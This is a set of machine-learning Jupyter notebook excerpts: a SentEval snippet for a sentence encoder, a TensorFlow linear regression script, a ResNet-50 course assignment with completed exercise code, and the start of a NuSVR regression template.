def prepare(params, samples):
return
def batcher(_, batch):
batch = [' '.join(sent) if sent else '.' for sent in batch]
return model.predict(tf.constant(batch))["default"]
se = senteval.engine.SE(params, batcher, prepare)
print("Evaluating task %s with %s parameters" % (TASK, PARAMS))
start = time.time()
results = se.eval(TASK)
end = time.time()
print('Time took on task %s : %.1f. seconds' % (TASK, end - start))
print(results)
```
#Learn More
* Find more text embedding models on [TensorFlow Hub](https://tfhub.dev)
* See also the [Multilingual Universal Sentence Encoder CMLM model](https://tfhub.dev/google/universal-sentence-encoder-cmlm/multilingual-base-br/1)
* Check out other [Universal Sentence Encoder models](https://tfhub.dev/google/collections/universal-sentence-encoder/1)
## Reference
* Ziyi Yang, Yinfei Yang, Daniel Cer, Jax Law, Eric Darve. [Universal Sentence Representations Learning with Conditional Masked Language Model. November 2020](https://openreview.net/forum?id=WDVD4lUCTzU)
|
github_jupyter
|
```
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
from sklearn import preprocessing
# Try to find value for W and b to compute y_data = x_data * W + b
# Define dimensions
d = 2 # Size of the parameter space
N = 50 # Number of data sample
# Model parameters
W = tf.Variable(tf.zeros([d, 1], tf.float32), name="weights")
b = tf.Variable(tf.zeros([1], tf.float32), name="biases")
# Model input and output
x = tf.placeholder(tf.float32, shape=[None, d])
y = tf.placeholder(tf.float32, shape=[None, 1])
# hypothesis
linear_regression_model = tf.add(tf.matmul(x, W), b)
# cost/loss function
loss = tf.reduce_mean(tf.square(linear_regression_model - y)) / 2
# optimizer
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.00015)
train = optimizer.minimize(loss)
# 导入训练集和测试集
training_filename = "dataForTraining.txt"
testing_filename = "dataForTesting.txt"
training_dataset = np.loadtxt(training_filename)
testing_dataset = np.loadtxt(testing_filename)
dataset = np.vstack((training_dataset,testing_dataset))
# 保存训练集中的参数(均值、方差)直接使用其对象转换测试集数据
# 特征缩放
min_max_scaler = preprocessing.MinMaxScaler()
# 标准化
normal_scaler = preprocessing.StandardScaler().fit(training_dataset)
# 归一化
dataset = min_max_scaler.fit_transform(dataset)
# 标准化
training_dataset = normal_scaler.transform(training_dataset)
testing_dataset = normal_scaler.transform(testing_dataset)
print(np.mean(training_dataset,axis=0))
print(np.std(training_dataset,axis=0))
print(np.mean(testing_dataset,axis=0))
print(np.std(testing_dataset,axis=0))
x_train = np.array(training_dataset[:,:2])
y_train = np.array(training_dataset[:,2:3])
x_test = np.array(testing_dataset[:,:2])
y_test = np.array(testing_dataset[:,2:3])
print("Training data shape:")
print(x_train.shape)
print("Testing data shape:")
print(x_test.shape)
print('')
print("normalized training data:")
print(x_train)
print('')
print("normalized testing data:")
print(x_test)
print('')
mini_batch_size = 1
n_batch = N // mini_batch_size + (N % mini_batch_size != 0)
print(n_batch)
save_step_loss = {"step":[],"train_loss":[],"test_loss":[]}# 保存step和loss用于可视化操作
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init) # reset values to wrong
steps = 1500001
for i in range(steps):
i_batch = (i % n_batch)*mini_batch_size
batch = x_train[i_batch:i_batch+mini_batch_size], y_train[i_batch:i_batch+mini_batch_size]
sess.run(train, {x: batch[0], y:batch[1]})
# random_index = np.random.choice(N)
# sess.run(train, {x: [x_train[random_index]], y:[y_train[random_index]]})
if i % 100000 == 0:
# evaluate training accuracy
print("iteration times: %s" % i)
curr_W, curr_b, curr_train_loss = sess.run([W, b, loss], {x: x_train, y: y_train})
print("W: %s \nb: %s \nTrain Loss: %s" % (curr_W, curr_b, curr_train_loss))
# Accuracy computation
curr_test_loss = sess.run(loss,{x:x_test,y:y_test})
print("Test Loss: %s\n" % curr_test_loss)
save_step_loss["step"].append(i)
save_step_loss["train_loss"].append(curr_train_loss)
save_step_loss["test_loss"].append(curr_test_loss)
#画图损失函数变化曲线
plt.plot(save_step_loss["step"],save_step_loss["train_loss"],label='Training Loss')
plt.plot(save_step_loss["step"],save_step_loss["test_loss"],label='Testing Loss')
plt.xlabel('Iteration times')
plt.ylabel('Loss')
plt.legend()
plt.show()
#画图损失函数变化曲线
plt.plot(save_step_loss["step"][1:],save_step_loss["train_loss"][1:],label='Training Loss')
plt.plot(save_step_loss["step"][1:],save_step_loss["test_loss"][1:],label='Testing Loss')
plt.xlabel('Iteration times')
plt.ylabel('Loss')
plt.legend()
plt.show()
#画图损失函数变化曲线
plt.plot(save_step_loss["step"][3:],save_step_loss["train_loss"][3:],label='Training Loss')
plt.plot(save_step_loss["step"][3:],save_step_loss["test_loss"][3:],label='Testing Loss')
plt.xlabel('Iteration times')
plt.ylabel('Loss')
plt.legend()
plt.show()
#画图损失函数变化曲线
plt.plot(save_step_loss["step"][5:],save_step_loss["train_loss"][5:],label='Training Loss')
plt.plot(save_step_loss["step"][5:],save_step_loss["test_loss"][5:],label='Testing Loss')
plt.xlabel('Iteration times')
plt.ylabel('Loss')
plt.legend()
plt.show()
print('Train Loss:\n',save_step_loss["train_loss"])
print('')
print('Test Loss:\n',save_step_loss["test_loss"])
```
|
github_jupyter
|
# Residual Networks
Welcome to the second assignment of this week! You will learn how to build very deep convolutional networks, using Residual Networks (ResNets). In theory, very deep networks can represent very complex functions; but in practice, they are hard to train. Residual Networks, introduced by [He et al.](https://arxiv.org/pdf/1512.03385.pdf), allow you to train much deeper networks than were previously practically feasible.
**In this assignment, you will:**
- Implement the basic building blocks of ResNets.
- Put together these building blocks to implement and train a state-of-the-art neural network for image classification.
## <font color='darkblue'>Updates</font>
#### If you were working on the notebook before this update...
* The current notebook is version "2a".
* You can find your original work saved in the notebook with the previous version name ("v2")
* To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#### List of updates
* For testing on an image, replaced `preprocess_input(x)` with `x=x/255.0` to normalize the input image in the same way that the model's training data was normalized.
* Refers to "shallower" layers as those layers closer to the input, and "deeper" layers as those closer to the output (Using "shallower" layers instead of "lower" or "earlier").
* Added/updated instructions.
This assignment will be done in Keras.
Before jumping into the problem, let's run the cell below to load the required packages.
```
import numpy as np
from keras import layers
from keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D
from keras.models import Model, load_model
from keras.preprocessing import image
from keras.utils import layer_utils
from keras.utils.data_utils import get_file
from keras.applications.imagenet_utils import preprocess_input
import pydot
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
from keras.utils import plot_model
from resnets_utils import *
from keras.initializers import glorot_uniform
import scipy.misc
from matplotlib.pyplot import imshow
%matplotlib inline
import keras.backend as K
K.set_image_data_format('channels_last')
K.set_learning_phase(1)
```
## 1 - The problem of very deep neural networks
Last week, you built your first convolutional neural network. In recent years, neural networks have become deeper, with state-of-the-art networks going from just a few layers (e.g., AlexNet) to over a hundred layers.
* The main benefit of a very deep network is that it can represent very complex functions. It can also learn features at many different levels of abstraction, from edges (at the shallower layers, closer to the input) to very complex features (at the deeper layers, closer to the output).
* However, using a deeper network doesn't always help. A huge barrier to training them is vanishing gradients: very deep networks often have a gradient signal that goes to zero quickly, thus making gradient descent prohibitively slow.
* More specifically, during gradient descent, as you backprop from the final layer back to the first layer, you are multiplying by the weight matrix on each step, and thus the gradient can decrease exponentially quickly to zero (or, in rare cases, grow exponentially quickly and "explode" to take very large values).
* During training, you might therefore see the magnitude (or norm) of the gradient for the shallower layers decrease to zero very rapidly as training proceeds:
<img src="images/vanishing_grad_kiank.png" style="width:450px;height:220px;">
<caption><center> <u> <font color='purple'> **Figure 1** </u><font color='purple'> : **Vanishing gradient** <br> The speed of learning decreases very rapidly for the shallower layers as the network trains </center></caption>
You are now going to solve this problem by building a Residual Network!
## 2 - Building a Residual Network
In ResNets, a "shortcut" or a "skip connection" allows the model to skip layers:
<img src="images/skip_connection_kiank.png" style="width:650px;height:200px;">
<caption><center> <u> <font color='purple'> **Figure 2** </u><font color='purple'> : A ResNet block showing a **skip-connection** <br> </center></caption>
The image on the left shows the "main path" through the network. The image on the right adds a shortcut to the main path. By stacking these ResNet blocks on top of each other, you can form a very deep network.
We also saw in lecture that having ResNet blocks with the shortcut also makes it very easy for one of the blocks to learn an identity function. This means that you can stack on additional ResNet blocks with little risk of harming training set performance.
(There is also some evidence that the ease of learning an identity function accounts for ResNets' remarkable performance even more so than skip connections helping with vanishing gradients).
Two main types of blocks are used in a ResNet, depending mainly on whether the input/output dimensions are same or different. You are going to implement both of them: the "identity block" and the "convolutional block."
### 2.1 - The identity block
The identity block is the standard block used in ResNets, and corresponds to the case where the input activation (say $a^{[l]}$) has the same dimension as the output activation (say $a^{[l+2]}$). To flesh out the different steps of what happens in a ResNet's identity block, here is an alternative diagram showing the individual steps:
<img src="images/idblock2_kiank.png" style="width:650px;height:150px;">
<caption><center> <u> <font color='purple'> **Figure 3** </u><font color='purple'> : **Identity block.** Skip connection "skips over" 2 layers. </center></caption>
The upper path is the "shortcut path." The lower path is the "main path." In this diagram, we have also made explicit the CONV2D and ReLU steps in each layer. To speed up training we have also added a BatchNorm step. Don't worry about this being complicated to implement--you'll see that BatchNorm is just one line of code in Keras!
In this exercise, you'll actually implement a slightly more powerful version of this identity block, in which the skip connection "skips over" 3 hidden layers rather than 2 layers. It looks like this:
<img src="images/idblock3_kiank.png" style="width:650px;height:150px;">
<caption><center> <u> <font color='purple'> **Figure 4** </u><font color='purple'> : **Identity block.** Skip connection "skips over" 3 layers.</center></caption>
Here are the individual steps.
First component of main path:
- The first CONV2D has $F_1$ filters of shape (1,1) and a stride of (1,1). Its padding is "valid" and its name should be `conv_name_base + '2a'`. Use 0 as the seed for the random initialization.
- The first BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2a'`.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
Second component of main path:
- The second CONV2D has $F_2$ filters of shape $(f,f)$ and a stride of (1,1). Its padding is "same" and its name should be `conv_name_base + '2b'`. Use 0 as the seed for the random initialization.
- The second BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2b'`.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
Third component of main path:
- The third CONV2D has $F_3$ filters of shape (1,1) and a stride of (1,1). Its padding is "valid" and its name should be `conv_name_base + '2c'`. Use 0 as the seed for the random initialization.
- The third BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2c'`.
- Note that there is **no** ReLU activation function in this component.
Final step:
- The `X_shortcut` and the output from the 3rd layer `X` are added together.
- **Hint**: The syntax will look something like `Add()([var1,var2])`
- Then apply the ReLU activation function. This has no name and no hyperparameters.
**Exercise**: Implement the ResNet identity block. We have implemented the first component of the main path. Please read this carefully to make sure you understand what it is doing. You should implement the rest.
- To implement the Conv2D step: [Conv2D](https://keras.io/layers/convolutional/#conv2d)
- To implement BatchNorm: [BatchNormalization](https://faroit.github.io/keras-docs/1.2.2/layers/normalization/) (axis: Integer, the axis that should be normalized (typically the 'channels' axis))
- For the activation, use: `Activation('relu')(X)`
- To add the value passed forward by the shortcut: [Add](https://keras.io/layers/merge/#add)
```
# GRADED FUNCTION: identity_block
def identity_block(X, f, filters, stage, block):
"""
Implementation of the identity block as defined in Figure 4
Arguments:
X -- input tensor of shape (m, n_H_prev, n_W_prev, n_C_prev)
f -- integer, specifying the shape of the middle CONV's window for the main path
filters -- python list of integers, defining the number of filters in the CONV layers of the main path
stage -- integer, used to name the layers, depending on their position in the network
block -- string/character, used to name the layers, depending on their position in the network
Returns:
X -- output of the identity block, tensor of shape (n_H, n_W, n_C)
"""
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value. You'll need this later to add back to the main path.
X_shortcut = X
# First component of main path
X = Conv2D(filters = F1, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X)
X = Activation('relu')(X)
### START CODE HERE ###
# Second component of main path (≈3 lines)
X = Conv2D(filters = F2, kernel_size = (f, f), strides = (1,1), padding = 'same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path (≈2 lines)
X = Conv2D(filters = F3, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X)
# Final step: Add shortcut value to main path, and pass it through a RELU activation (≈2 lines)
R = Add()([X_shortcut,X])
X = Activation('relu')(R)
### END CODE HERE ###
return X
tf.reset_default_graph()
with tf.Session() as test:
np.random.seed(1)
A_prev = tf.placeholder("float", [3, 4, 4, 6])
X = np.random.randn(3, 4, 4, 6)
A = identity_block(A_prev, f = 2, filters = [2, 4, 6], stage = 1, block = 'a')
test.run(tf.global_variables_initializer())
out = test.run([A], feed_dict={A_prev: X, K.learning_phase(): 0})
print("out = " + str(out[0][1][1][0]))
```
**Expected Output**:
<table>
<tr>
<td>
**out**
</td>
<td>
[ 0.94822985 0. 1.16101444 2.747859 0. 1.36677003]
</td>
</tr>
</table>
## 2.2 - The convolutional block
The ResNet "convolutional block" is the second block type. You can use this type of block when the input and output dimensions don't match up. The difference with the identity block is that there is a CONV2D layer in the shortcut path:
<img src="images/convblock_kiank.png" style="width:650px;height:150px;">
<caption><center> <u> <font color='purple'> **Figure 4** </u><font color='purple'> : **Convolutional block** </center></caption>
* The CONV2D layer in the shortcut path is used to resize the input $x$ to a different dimension, so that the dimensions match up in the final addition needed to add the shortcut value back to the main path. (This plays a similar role as the matrix $W_s$ discussed in lecture.)
* For example, to reduce the activation dimensions's height and width by a factor of 2, you can use a 1x1 convolution with a stride of 2.
* The CONV2D layer on the shortcut path does not use any non-linear activation function. Its main role is to just apply a (learned) linear function that reduces the dimension of the input, so that the dimensions match up for the later addition step.
The details of the convolutional block are as follows.
First component of main path:
- The first CONV2D has $F_1$ filters of shape (1,1) and a stride of (s,s). Its padding is "valid" and its name should be `conv_name_base + '2a'`. Use 0 as the `glorot_uniform` seed.
- The first BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2a'`.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
Second component of main path:
- The second CONV2D has $F_2$ filters of shape (f,f) and a stride of (1,1). Its padding is "same" and it's name should be `conv_name_base + '2b'`. Use 0 as the `glorot_uniform` seed.
- The second BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2b'`.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
Third component of main path:
- The third CONV2D has $F_3$ filters of shape (1,1) and a stride of (1,1). Its padding is "valid" and it's name should be `conv_name_base + '2c'`. Use 0 as the `glorot_uniform` seed.
- The third BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '2c'`. Note that there is no ReLU activation function in this component.
Shortcut path:
- The CONV2D has $F_3$ filters of shape (1,1) and a stride of (s,s). Its padding is "valid" and its name should be `conv_name_base + '1'`. Use 0 as the `glorot_uniform` seed.
- The BatchNorm is normalizing the 'channels' axis. Its name should be `bn_name_base + '1'`.
Final step:
- The shortcut and the main path values are added together.
- Then apply the ReLU activation function. This has no name and no hyperparameters.
**Exercise**: Implement the convolutional block. We have implemented the first component of the main path; you should implement the rest. As before, always use 0 as the seed for the random initialization, to ensure consistency with our grader.
- [Conv2D](https://keras.io/layers/convolutional/#conv2d)
- [BatchNormalization](https://keras.io/layers/normalization/#batchnormalization) (axis: Integer, the axis that should be normalized (typically the features axis))
- For the activation, use: `Activation('relu')(X)`
- [Add](https://keras.io/layers/merge/#add)
```
# GRADED FUNCTION: convolutional_block
def convolutional_block(X, f, filters, stage, block, s = 2):
"""
Implementation of the convolutional block as defined in Figure 4
Arguments:
X -- input tensor of shape (m, n_H_prev, n_W_prev, n_C_prev)
f -- integer, specifying the shape of the middle CONV's window for the main path
filters -- python list of integers, defining the number of filters in the CONV layers of the main path
stage -- integer, used to name the layers, depending on their position in the network
block -- string/character, used to name the layers, depending on their position in the network
s -- Integer, specifying the stride to be used
Returns:
X -- output of the convolutional block, tensor of shape (n_H, n_W, n_C)
"""
# defining name basis
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
# Retrieve Filters
F1, F2, F3 = filters
# Save the input value
X_shortcut = X
##### MAIN PATH #####
# First component of main path
X = Conv2D(F1,kernel_size= (1, 1), strides = (s,s),padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X)
X = Activation('relu')(X)
### START CODE HERE ###
# Second component of main path (≈3 lines)
X = Conv2D(F2,kernel_size= (f, f), strides = (1,1), name = conv_name_base + '2b',padding = 'same', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X)
X = Activation('relu')(X)
# Third component of main path (≈2 lines)
X = Conv2D(F3,kernel_size= (1, 1), strides = (1,1),padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X)
##### SHORTCUT PATH #### (≈2 lines)
X_shortcut = Conv2D(F3,kernel_size= (1, 1), strides = (s,s),padding = 'valid', name = conv_name_base + '1', kernel_initializer = glorot_uniform(seed=0))(X_shortcut)
X_shortcut = BatchNormalization(axis = 3, name = bn_name_base + '1')(X_shortcut)
# Final step: Add shortcut value to main path, and pass it through a RELU activation (≈2 lines)
X = Add()([X,X_shortcut])
X = Activation('relu')(X)
### END CODE HERE ###
return X
tf.reset_default_graph()
with tf.Session() as test:
np.random.seed(1)
A_prev = tf.placeholder("float", [3, 4, 4, 6])
X = np.random.randn(3, 4, 4, 6)
A = convolutional_block(A_prev, f = 2, filters = [2, 4, 6], stage = 1, block = 'a')
test.run(tf.global_variables_initializer())
out = test.run([A], feed_dict={A_prev: X, K.learning_phase(): 0})
print("out = " + str(out[0][1][1][0]))
```
**Expected Output**:
<table>
<tr>
<td>
**out**
</td>
<td>
[ 0.09018463 1.23489773 0.46822017 0.0367176 0. 0.65516603]
</td>
</tr>
</table>
## 3 - Building your first ResNet model (50 layers)
You now have the necessary blocks to build a very deep ResNet. The following figure describes in detail the architecture of this neural network. "ID BLOCK" in the diagram stands for "Identity block," and "ID BLOCK x3" means you should stack 3 identity blocks together.
<img src="images/resnet_kiank.png" style="width:850px;height:150px;">
<caption><center> <u> <font color='purple'> **Figure 5** </u><font color='purple'> : **ResNet-50 model** </center></caption>
The details of this ResNet-50 model are:
- Zero-padding pads the input with a pad of (3,3)
- Stage 1:
- The 2D Convolution has 64 filters of shape (7,7) and uses a stride of (2,2). Its name is "conv1".
- BatchNorm is applied to the 'channels' axis of the input.
- MaxPooling uses a (3,3) window and a (2,2) stride.
- Stage 2:
- The convolutional block uses three sets of filters of size [64,64,256], "f" is 3, "s" is 1 and the block is "a".
- The 2 identity blocks use three sets of filters of size [64,64,256], "f" is 3 and the blocks are "b" and "c".
- Stage 3:
- The convolutional block uses three sets of filters of size [128,128,512], "f" is 3, "s" is 2 and the block is "a".
- The 3 identity blocks use three sets of filters of size [128,128,512], "f" is 3 and the blocks are "b", "c" and "d".
- Stage 4:
- The convolutional block uses three sets of filters of size [256, 256, 1024], "f" is 3, "s" is 2 and the block is "a".
- The 5 identity blocks use three sets of filters of size [256, 256, 1024], "f" is 3 and the blocks are "b", "c", "d", "e" and "f".
- Stage 5:
- The convolutional block uses three sets of filters of size [512, 512, 2048], "f" is 3, "s" is 2 and the block is "a".
- The 2 identity blocks use three sets of filters of size [512, 512, 2048], "f" is 3 and the blocks are "b" and "c".
- The 2D Average Pooling uses a window of shape (2,2) and its name is "avg_pool".
- The 'flatten' layer doesn't have any hyperparameters or name.
- The Fully Connected (Dense) layer reduces its input to the number of classes using a softmax activation. Its name should be `'fc' + str(classes)`.
**Exercise**: Implement the ResNet with 50 layers described in the figure above. We have implemented Stages 1 and 2. Please implement the rest. (The syntax for implementing Stages 3-5 should be quite similar to that of Stage 2.) Make sure you follow the naming convention in the text above.
You'll need to use this function:
- Average pooling [see reference](https://keras.io/layers/pooling/#averagepooling2d)
Here are some other functions we used in the code below:
- Conv2D: [See reference](https://keras.io/layers/convolutional/#conv2d)
- BatchNorm: [See reference](https://keras.io/layers/normalization/#batchnormalization) (axis: Integer, the axis that should be normalized (typically the features axis))
- Zero padding: [See reference](https://keras.io/layers/convolutional/#zeropadding2d)
- Max pooling: [See reference](https://keras.io/layers/pooling/#maxpooling2d)
- Fully connected layer: [See reference](https://keras.io/layers/core/#dense)
- Addition: [See reference](https://keras.io/layers/merge/#add)
```
# GRADED FUNCTION: ResNet50
def ResNet50(input_shape = (64, 64, 3), classes = 6):
"""
Implementation of the popular ResNet50 the following architecture:
CONV2D -> BATCHNORM -> RELU -> MAXPOOL -> CONVBLOCK -> IDBLOCK*2 -> CONVBLOCK -> IDBLOCK*3
-> CONVBLOCK -> IDBLOCK*5 -> CONVBLOCK -> IDBLOCK*2 -> AVGPOOL -> TOPLAYER
Arguments:
input_shape -- shape of the images of the dataset
classes -- integer, number of classes
Returns:
model -- a Model() instance in Keras
"""
# Define the input as a tensor with shape input_shape
X_input = Input(input_shape)
# Zero-Padding
X = ZeroPadding2D((3, 3))(X_input)
# Stage 1
X = Conv2D(64, (7, 7), strides = (2, 2), name = 'conv1', kernel_initializer = glorot_uniform(seed=0))(X)
X = BatchNormalization(axis = 3, name = 'bn_conv1')(X)
X = Activation('relu')(X)
X = MaxPooling2D((3, 3), strides=(2, 2))(X)
# Stage 2
X = convolutional_block(X, f = 3, filters = [64, 64, 256], stage = 2, block='a', s = 1)
X = identity_block(X, 3, [64, 64, 256], stage=2, block='b')
X = identity_block(X, 3, [64, 64, 256], stage=2, block='c')
### START CODE HERE ###
#[128,128,512], "f" is 3, "s" is 2 and the block is "a".
#The 3 identity blocks use three sets of filters of size [128,128,512], "f" is 3 and the blocks are "b", "c" and "d".
# Stage 3 (≈4 lines)
X = convolutional_block(X,f=3,s=2,filters = [128,128,512],stage = 3,block = 'a')
X = identity_block(X,3,[128,128,512],stage = 3,block = 'b')
X = identity_block(X,3,[128,128,512],stage = 3,block = 'c')
X = identity_block(X,3,[128,128,512],stage = 3,block = 'd')
#The convolutional block uses three sets of filters of size [256, 256, 1024], "f" is 3, "s" is 2 and the block is "a".
#The 5 identity blocks use three sets of filters of size [256, 256, 1024], "f" is 3 and the blocks are "b", "c", "d", "e" and "f".
# Stage 4 (≈6 lines)
X = convolutional_block(X, f=3, filters=[256, 256, 1024], stage=4, block='a', s=2)
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='b')
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c')
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d')
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e')
X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f')
# Stage 5 (≈3 lines)
X = X = convolutional_block(X, f=3, filters=[512, 512, 2048], stage=5, block='a', s=2)
X = identity_block(X, 3, [512, 512, 2048], stage=5, block='b')
X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c')
# AVGPOOL (≈1 line). Use "X = AveragePooling2D(...)(X)"
X = AveragePooling2D(pool_size=(2, 2), padding='same')(X)
### END CODE HERE ###
# output layer
X = Flatten()(X)
X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform(seed=0))(X)
# Create model
model = Model(inputs = X_input, outputs = X, name='ResNet50')
return model
```
Run the following code to build the model's graph. If your implementation is not correct you will know it by checking your accuracy when running `model.fit(...)` below.
```
model = ResNet50(input_shape = (64, 64, 3), classes = 6)
```
As seen in the Keras Tutorial Notebook, prior training a model, you need to configure the learning process by compiling the model.
```
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
```
The model is now ready to be trained. The only thing you need is a dataset.
Let's load the SIGNS Dataset.
<img src="images/signs_data_kiank.png" style="width:450px;height:250px;">
<caption><center> <u> <font color='purple'> **Figure 6** </u><font color='purple'> : **SIGNS dataset** </center></caption>
```
X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()
# Normalize image vectors
X_train = X_train_orig/255.
X_test = X_test_orig/255.
# Convert training and test labels to one hot matrices
Y_train = convert_to_one_hot(Y_train_orig, 6).T
Y_test = convert_to_one_hot(Y_test_orig, 6).T
print ("number of training examples = " + str(X_train.shape[0]))
print ("number of test examples = " + str(X_test.shape[0]))
print ("X_train shape: " + str(X_train.shape))
print ("Y_train shape: " + str(Y_train.shape))
print ("X_test shape: " + str(X_test.shape))
print ("Y_test shape: " + str(Y_test.shape))
```
Run the following cell to train your model on 2 epochs with a batch size of 32. On a CPU it should take you around 5min per epoch.
```
model.fit(X_train, Y_train, epochs = 2, batch_size = 32)
```
**Expected Output**:
<table>
<tr>
<td>
** Epoch 1/2**
</td>
<td>
loss: between 1 and 5, acc: between 0.2 and 0.5, although your results can be different from ours.
</td>
</tr>
<tr>
<td>
** Epoch 2/2**
</td>
<td>
loss: between 1 and 5, acc: between 0.2 and 0.5, you should see your loss decreasing and the accuracy increasing.
</td>
</tr>
</table>
Let's see how this model (trained on only two epochs) performs on the test set.
```
preds = model.evaluate(X_test, Y_test)
print ("Loss = " + str(preds[0]))
print ("Test Accuracy = " + str(preds[1]))
```
**Expected Output**:
<table>
<tr>
<td>
**Test Accuracy**
</td>
<td>
between 0.16 and 0.25
</td>
</tr>
</table>
For the purpose of this assignment, we've asked you to train the model for just two epochs. You can see that it achieves poor performances. Please go ahead and submit your assignment; to check correctness, the online grader will run your code only for a small number of epochs as well.
After you have finished this official (graded) part of this assignment, you can also optionally train the ResNet for more iterations, if you want. We get a lot better performance when we train for ~20 epochs, but this will take more than an hour when training on a CPU.
Using a GPU, we've trained our own ResNet50 model's weights on the SIGNS dataset. You can load and run our trained model on the test set in the cells below. It may take ≈1min to load the model.
```
model = load_model('ResNet50.h5')
preds = model.evaluate(X_test, Y_test)
print ("Loss = " + str(preds[0]))
print ("Test Accuracy = " + str(preds[1]))
```
ResNet50 is a powerful model for image classification when it is trained for an adequate number of iterations. We hope you can use what you've learnt and apply it to your own classification problem to perform state-of-the-art accuracy.
Congratulations on finishing this assignment! You've now implemented a state-of-the-art image classification system!
## 4 - Test on your own image (Optional/Ungraded)
If you wish, you can also take a picture of your own hand and see the output of the model. To do this:
1. Click on "File" in the upper bar of this notebook, then click "Open" to go on your Coursera Hub.
2. Add your image to this Jupyter Notebook's directory, in the "images" folder
3. Write your image's name in the following code
4. Run the code and check if the algorithm is right!
```
img_path = 'images/my_image.jpg'
img = image.load_img(img_path, target_size=(64, 64))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = x/255.0
print('Input image shape:', x.shape)
my_image = scipy.misc.imread(img_path)
imshow(my_image)
print("class prediction vector [p(0), p(1), p(2), p(3), p(4), p(5)] = ")
print(model.predict(x))
```
You can also print a summary of your model by running the following code.
```
model.summary()
```
Finally, run the code below to visualize your ResNet50. You can also download a .png picture of your model by going to "File -> Open...-> model.png".
```
plot_model(model, to_file='model.png')
SVG(model_to_dot(model).create(prog='dot', format='svg'))
```
## What you should remember
- Very deep "plain" networks don't work in practice because they are hard to train due to vanishing gradients.
- The skip-connections help to address the Vanishing Gradient problem. They also make it easy for a ResNet block to learn an identity function.
- There are two main types of blocks: The identity block and the convolutional block.
- Very deep Residual Networks are built by stacking these blocks together.
### References
This notebook presents the ResNet algorithm due to He et al. (2015). The implementation here also took significant inspiration and follows the structure given in the GitHub repository of Francois Chollet:
- Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun - [Deep Residual Learning for Image Recognition (2015)](https://arxiv.org/abs/1512.03385)
- Francois Chollet's GitHub repository: https://github.com/fchollet/deep-learning-models/blob/master/resnet50.py
|
github_jupyter
|
# Nu-Support Vector Regression with StandardScaler & Quantile Transformer
This Code template is for regression analysis using a Nu-Support Vector Regressor(NuSVR) based on the Support Vector Machine algorithm with Quantile Transformer as Feature Transformation Technique and StandardScaler for Feature Scaling in a pipeline.
### Required Packages
```
import warnings
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as se
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler, QuantileTransformer
from sklearn.model_selection import train_test_split
from sklearn.svm import NuSVR
from sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error
warnings.filterwarnings('ignore')
```
### Initialization
Filepath of CSV file
```
file_path= ""
```
List of features which are required for model training .
```
features =[]
```
Target feature for prediction.
```
target=''
```
### Data Fetching
Pandas is an open-source, BSD-licensed library providing high-performance, easy-to-use data manipulation and data analysis tools.
We will use panda's library to read the CSV file using its storage path.And we use the head function to display the initial row or entry.
```
df=pd.read_csv(file_path)
df.head()
```
### Feature Selections
It is the process of reducing the number of input variables when developing a predictive model. Used to reduce the number of input variables to both reduce the computational cost of modelling and, in some cases, to improve the performance of the model.
We will assign all the required input features to X and target/outcome to Y.
```
X=df[features]
Y=df[target]
```
### Data Preprocessing
Since the majority of the machine learning models in the Sklearn library doesn't handle string category data and Null value, we have to explicitly remove or replace null values. The below snippet have functions, which removes the null value if any exists. And convert the string classes data in the datasets by encoding them to integer classes.
```
def NullClearner(df):
if(isinstance(df, pd.Series) and (df.dtype in ["float64","int64"])):
df.fillna(df.mean(),inplace=True)
return df
elif(isinstance(df, pd.Series)):
df.fillna(df.mode()[0],inplace=True)
return df
else:return df
def EncodeX(df):
return pd.get_dummies(df)
```
Calling preprocessing functions on the feature and target set.
```
